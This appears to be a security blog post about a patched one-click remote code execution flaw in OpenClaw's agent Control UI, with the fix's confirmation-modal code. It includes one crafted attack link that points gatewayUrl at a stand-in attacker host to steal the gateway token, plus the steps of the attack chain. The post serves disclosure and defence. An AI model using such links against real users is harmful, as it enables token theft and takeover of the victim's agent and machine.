MMNTM logo
Request Early Access
Security

The OpenClaw RCE: Your Browser as the Attack Vector

A 1-click remote code execution in OpenClaw, patched seven days after the vulnerable feature shipped. The attack works even with localhost binding.

Greg Salwitz
5 min read
#OpenClaw#Security#Vulnerability#RCE#Agent Security
The OpenClaw RCE: Your Browser as the Attack Vector

A tweet from @IntCyberDigest hit 75K views in four hours: "An ex-Anthropic engineer just published a 1-click remote code execution exploit for OpenClaw." Cute lobster mascot art on one side, CVSS 8.8 on the other. The attack completes in milliseconds. The victim doesn't type anything or approve any prompts.

The interesting part: it works even when the gateway binds exclusively to localhost.

Seven Days

On January 21, PR #1342 merged. The feature: parse gatewayUrl from URL parameters so users could bookmark connections to remote gateways. The PR description even mentioned "(security)"—the URL gets cleaned from the browser address bar after being applied.

On January 28, security researchers disclosed that this feature enables token exfiltration and remote code execution.

Seven days from feature merge to CVE.

The Mechanism

The Control UI auto-connects to whatever gatewayUrl appears in the query string. On connection, it sends the authentication token in the WebSocket payload.

An attacker crafts a link:

https://control.openclaw.app/?gatewayUrl=wss://collect.attacker.com/token

The victim clicks it. Their browser loads the legitimate Control UI, which dutifully connects to the attacker's server and transmits the gateway token. The attacker now has operator-level access.

"But my gateway only binds to 127.0.0.1."

Doesn't matter. The vulnerability exploits a fundamental property of browsers: they make requests on behalf of the user, from the user's machine. The victim's browser becomes the bridge.

  1. Victim clicks link
  2. Browser loads Control UI from legitimate domain
  3. Control UI reads gatewayUrl from query string
  4. Control UI opens WebSocket to attacker's server
  5. Token travels over that connection
  6. Attacker uses token to connect to victim's localhost gateway

The outbound WebSocket to the attacker is allowed—browsers make cross-origin WebSocket connections constantly. Localhost binding stops direct network attacks. It doesn't stop attacks that route through the victim's browser.

For an agent with shell access, token exfiltration means full system compromise. The attacker can disable sandboxing, modify tool policies, execute commands. The victim's machine is now the attacker's machine.

The Patch

André Baptista (0xacb), one of the researchers who found the vulnerability, co-authored the fix. Commit a7534dc adds a confirmation modal that blocks automatic connection.

From gateway-url-confirmation.ts:

export function renderGatewayUrlConfirmation(state: AppViewState) {
  if (!state.pendingGatewayUrl) return '';
 
  return html`
    <div role="dialog" aria-modal="true">
      <h2>Change Gateway URL</h2>
      <code>\${state.pendingGatewayUrl}</code>
      <div class="warning">
        Only confirm if you trust this URL.
        Malicious URLs can compromise your system.
      </div>
      <button @click=\${state.handleGatewayUrlConfirm}>Confirm</button>
      <button @click=\${state.handleGatewayUrlCancel}>Cancel</button>
    </div>
  `;
}

Instead of auto-connecting, the URL goes into pendingGatewayUrl state. The user sees a warning. Connection only happens after explicit confirmation.

The fix shipped same-day as disclosure.

The Pattern

This vulnerability doesn't look like a bug. PR #1342 passed code review. The feature worked as designed. The URL parameter was even sanitized from the address bar for "security."

The problem: the threat model was incomplete. The author considered whether the URL should be visible in browser history. They didn't consider whether the connection flow itself could be weaponized.

This is why agent security is hard. Traditional web apps have a clear trust boundary: server doesn't trust client, validates inputs, guards resources. Agent systems invert this. The agent runs locally with user permissions. The trust boundary is between the agent and the outside world—web pages, files, messages. Any of these can be adversarial.

The Control UI trusted a URL parameter. That parameter could be set by anyone who could get a victim to click a link.

The Week

This disclosure landed during a week when OpenClaw shipped seven other security fixes: TLS 1.3 minimum, exec tool environment validation, WhatsApp path traversal prevention, web tools hardening, LFI prevention in the media parser, gateway token hardening, SSE timeout for resource exhaustion.

The project has been through rebrands, account hijackings, and security scrutiny. This is part of that story. When you're building software that executes shell commands on user machines, every feature is a potential attack surface. Every convenience is a potential exfiltration vector.

The OpenClaw team's response—same-day patch, coordinated disclosure, finder co-authoring the fix—is how it should work. But the vulnerability existing in the first place is the lesson. Features that auto-connect, auto-authenticate, or auto-transmit credentials are dangerous by default. The safe pattern is explicit user confirmation for anything touching tokens.

See also: Building Personal AI Infrastructure for the gateway architecture and The Intelligence Layer for agent internals.

Greg SalwitzFeb 1, 2026

Related

VIEW ALL_
OpenClaw Soul & Evil: The Identity File That Became an Attack SurfaceThe Architecture of Clawdbot: Building Personal AI InfrastructureThe Intelligence Layer: How OpenClaw Thinks